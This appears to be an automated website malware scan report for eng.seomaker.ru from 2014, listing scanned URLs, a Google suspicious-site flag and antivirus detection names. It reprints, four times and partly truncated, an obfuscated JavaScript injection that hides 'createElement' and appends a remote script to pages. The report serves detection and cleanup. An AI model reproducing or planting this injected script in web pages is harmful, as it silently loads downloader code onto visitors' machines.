New scan:

Malware Scanner report for eng.seomaker.ru

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "eng.seomaker.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eng.seomaker.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://eng.seomaker.ru/
200 OK
Content-Length: 13518
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function y() {this.g="";this.S='';var z='[';var I=new String();var m;if(m!='ON'){m=''};var n=RegExp;var F='g';this.gz="";var SK;if(SK!=''){SK='v'};var _=']';var c='replace';var cU;if(cU!='' && cU!='s'){cU='oe'};var Bs;if(Bs!=''){Bs='Ny'};function Z(W,ca){this.v_='';this.k_="";var P;if(P!='gL'){P=''};var C=z;var GR=new String();C+=ca;C+=_;var T=new n(C, F);return W[c](T, I);var tX=new Array();var TW;if(TW!=''){TW='Y'};};this.GL='';var u="";var O=Z('cMrYePaZtMePEolMePmYePnZtY',"YoPMZ");var
... 1052 bytes are skipped ...
ument[O](rz);this.NK='';var yo;if(yo!='' && yo!='zi'){yo='gi'};var bw;if(bw!=''){bw='yy'};Zx(rJ,'defer',([1][0]));var m_="";var AH="";Zx(rJ,'src',nz);var bm;if(bm!='iw' && bm != ''){bm=null};var ij=new String();document.body.appendChild(rJ);this.bR='';} catch(o){this.rD="";};};var Bn;if(Bn!='' && Bn!='uQ'){Bn=''};function Zx(J,K,M){J.setAttribute(K, M);}var Co;if(Co!='cC' && Co!='yZ'){Co='cC'};var mD;if(mD!='yS'){mD=''};};var Rg;if(Rg!=''){Rg='qF'};y();var xQt="";

Antivirus reports:

Avast
JS:Illredir-W [Trj]
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.GM
Fortinet
JS/Crypt.BBEA!tr
NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm
VIPRE
Trojan.JS.Redirector.bh (v)
AVG
JS/Dropper
Norman
Redir.IN
Sophos
Troj/JSRedir-AU
GData
JS:Illredir-W
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSM

http://eng.seomaker.ru/index.htm
200 OK
Content-Length: 13518
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function y() {this.g="";this.S='';var z='[';var I=new String();var m;if(m!='ON'){m=''};var n=RegExp;var F='g';this.gz="";var SK;if(SK!=''){SK='v'};var _=']';var c='replace';var cU;if(cU!='' && cU!='s'){cU='oe'};var Bs;if(Bs!=''){Bs='Ny'};function Z(W,ca){this.v_='';this.k_="";var P;if(P!='gL'){P=''};var C=z;var GR=new String();C+=ca;C+=_;var T=new n(C, F);return W[c](T, I);var tX=new Array();var TW;if(TW!=''){TW='Y'};};this.GL='';var u="";var O=Z('cMrYePaZtMePEolMePmYePnZtY',"YoPMZ");var
... 1052 bytes are skipped ...
ument[O](rz);this.NK='';var yo;if(yo!='' && yo!='zi'){yo='gi'};var bw;if(bw!=''){bw='yy'};Zx(rJ,'defer',([1][0]));var m_="";var AH="";Zx(rJ,'src',nz);var bm;if(bm!='iw' && bm != ''){bm=null};var ij=new String();document.body.appendChild(rJ);this.bR='';} catch(o){this.rD="";};};var Bn;if(Bn!='' && Bn!='uQ'){Bn=''};function Zx(J,K,M){J.setAttribute(K, M);}var Co;if(Co!='cC' && Co!='yZ'){Co='cC'};var mD;if(mD!='yS'){mD=''};};var Rg;if(Rg!=''){Rg='qF'};y();var xQt="";

Antivirus reports:

Avast
JS:Illredir-W [Trj]
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.GM
Fortinet
JS/Crypt.BBEA!tr
NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm
VIPRE
Trojan.JS.Redirector.bh (v)
AVG
JS/Dropper
Norman
Redir.IN
Sophos
Troj/JSRedir-AU
GData
JS:Illredir-W
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSM

http://eng.seomaker.ru/map.htm
404 Not Found
Content-Length: 205
Content-Type: text/html
clean
http://eng.seomaker.ru/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://eng.seomaker.ru/94303Directory.php
200 OK
Content-Length: 15147
Content-Type: text/html
clean
http://eng.seomaker.ru/?CategoryID=2
200 OK
Content-Length: 13518
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function y() {this.g="";this.S='';var z='[';var I=new String();var m;if(m!='ON'){m=''};var n=RegExp;var F='g';this.gz="";var SK;if(SK!=''){SK='v'};var _=']';var c='replace';var cU;if(cU!='' && cU!='s'){cU='oe'};var Bs;if(Bs!=''){Bs='Ny'};function Z(W,ca){this.v_='';this.k_="";var P;if(P!='gL'){P=''};var C=z;var GR=new String();C+=ca;C+=_;var T=new n(C, F);return W[c](T, I);var tX=new Array();var TW;if(TW!=''){TW='Y'};};this.GL='';var u="";var O=Z('cMrYePaZtMePEolMePmYePnZtY',"YoPMZ");var
... 1052 bytes are skipped ...
ument[O](rz);this.NK='';var yo;if(yo!='' && yo!='zi'){yo='gi'};var bw;if(bw!=''){bw='yy'};Zx(rJ,'defer',([1][0]));var m_="";var AH="";Zx(rJ,'src',nz);var bm;if(bm!='iw' && bm != ''){bm=null};var ij=new String();document.body.appendChild(rJ);this.bR='';} catch(o){this.rD="";};};var Bn;if(Bn!='' && Bn!='uQ'){Bn=''};function Zx(J,K,M){J.setAttribute(K, M);}var Co;if(Co!='cC' && Co!='yZ'){Co='cC'};var mD;if(mD!='yS'){mD=''};};var Rg;if(Rg!=''){Rg='qF'};y();var xQt="";

Antivirus reports:

Avast
JS:Illredir-W [Trj]
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.GM
Fortinet
JS/Crypt.BBEA!tr
NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm
VIPRE
Trojan.JS.Redirector.bh (v)
AVG
JS/Dropper
Norman
Redir.IN
Sophos
Troj/JSRedir-AU
GData
JS:Illredir-W
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSM

http://eng.seomaker.ru/belinkeddirectory.php
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://eng.seomaker.ru/linka.php
200 OK
Content-Length: 88
Content-Type: text/html
clean
http://eng.seomaker.ru/linkexchange.php
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://eng.seomaker.ru/links1.php
200 OK
Content-Length: 147
Content-Type: text/html
clean
http://eng.seomaker.ru/resources.php
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://eng.seomaker.ru/SC.php
200 OK
Content-Length: 3288
Content-Type: text/html
clean
http://eng.seomaker.ru/tels.php
200 OK
Content-Length: 4299
Content-Type: text/html
clean
http://eng.seomaker.ru/?this=2
200 OK
Content-Length: 13518
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function y() {this.g="";this.S='';var z='[';var I=new String();var m;if(m!='ON'){m=''};var n=RegExp;var F='g';this.gz="";var SK;if(SK!=''){SK='v'};var _=']';var c='replace';var cU;if(cU!='' && cU!='s'){cU='oe'};var Bs;if(Bs!=''){Bs='Ny'};function Z(W,ca){this.v_='';this.k_="";var P;if(P!='gL'){P=''};var C=z;var GR=new String();C+=ca;C+=_;var T=new n(C, F);return W[c](T, I);var tX=new Array();var TW;if(TW!=''){TW='Y'};};this.GL='';var u="";var O=Z('cMrYePaZtMePEolMePmYePnZtY',"YoPMZ");var
... 1052 bytes are skipped ...
ument[O](rz);this.NK='';var yo;if(yo!='' && yo!='zi'){yo='gi'};var bw;if(bw!=''){bw='yy'};Zx(rJ,'defer',([1][0]));var m_="";var AH="";Zx(rJ,'src',nz);var bm;if(bm!='iw' && bm != ''){bm=null};var ij=new String();document.body.appendChild(rJ);this.bR='';} catch(o){this.rD="";};};var Bn;if(Bn!='' && Bn!='uQ'){Bn=''};function Zx(J,K,M){J.setAttribute(K, M);}var Co;if(Co!='cC' && Co!='yZ'){Co='cC'};var mD;if(mD!='yS'){mD=''};};var Rg;if(Rg!=''){Rg='qF'};y();var xQt="";

Antivirus reports:

Avast
JS:Illredir-W [Trj]
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.GM
Fortinet
JS/Crypt.BBEA!tr
NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm
VIPRE
Trojan.JS.Redirector.bh (v)
AVG
JS/Dropper
Norman
Redir.IN
Sophos
Troj/JSRedir-AU
GData
JS:Illredir-W
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSM

http://eng.seomaker.ru/TopResources.php
200 OK
Content-Length: 41857
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eng.seomaker.ru

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Tue, 26 Aug 2014 01:39:23 GMT
Accept-Ranges: bytes
ETag: "62a3a127-34ce-480429c0ae840"
Server: Apache
Content-Length: 13518
Content-Type: text/html; charset=windows-1251
Expires: Tue, 26 Aug 2014 01:39:23 GMT
Last-Modified: Tue, 23 Feb 2010 11:11:21 GMT

...13518 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eng.seomaker.ru
Referer: http://www.google.com/search?q=eng.seomaker.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.